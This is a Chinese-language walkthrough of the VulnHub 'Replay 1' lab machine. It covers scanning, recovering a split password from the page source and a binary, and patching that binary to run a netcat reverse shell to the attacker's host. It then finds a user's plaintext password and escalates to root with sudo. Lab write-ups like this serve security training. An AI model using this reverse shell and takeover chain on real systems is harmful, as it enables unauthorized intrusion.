vulnhub-Replay 1靶机

vulnhub:https://www.vulnhub.com/entry/replay-1,278/

导入靶机,放在kali同网段,扫描

image-20240927085646526

靶机在192.168.81.8,扫描端口

image-20240927085717794

开启了三个端口,存在网站服务,访问

image-20240927085835062

网页上有个超链接,点击后下载了这样一个文档文件

image-20240927085943383

网页元素里有这么一行

image-20240927090031783

P1:qGQjwO4h6g,目前作用未知,扫描网站目录

image-20240927090210763

扫到几个,查看一下,files和media都是网页直接能访问到的东西,没啥用,robots指出一个新的文件

image-20240927090444656

下载下来,解压出来一个文档和一个程序

image-20240927090558546

文档里没有有用的内容,当以字符串查看程序时找到这样一句话

image-20240927090822043

之前找到一个P1,应该是要和这个拼接成一个密码

qGQjwO4h6gh0TAIRNXuQcDu9Lqsyul

现在尝试运行程序

image-20240927091414781

输入IP和密码后成功执行,但是输入命令时又提示不允许

image-20240927091452105

看了网上的分析这个程序实际上执行的是文件里的whoami,修改为uname -a,同时删除as后的冒号和空格

image-20240927091723618

image-20240927092315522

保存后再次执行

image-20240927092515735

这次这里显示的就不是Bob,而是新写入的命令,所以我们写入反弹shell的命令,但是要注意写入时要让文件大小不变,所以需要插入额外的字符

nc -e /bin/bash 192.168.1.25 4444;ls;ls;ls;ls;ls;ls;ls;

image-20240927093027814

kali开启监听,再次执行程序

image-20240927093155844

获得shell,生成交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

sudo命令需要密码,找找看

在bob家目录的文档文件夹下的.ftp文件夹找到了bob的密码文档

image-20240927093442062

b0bcat_1234567890

image-20240927093630304

显示我们可以用所有的sudo命令,sudo su提权

image-20240927093658680

flag在根文件夹

image-20240927093746001

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值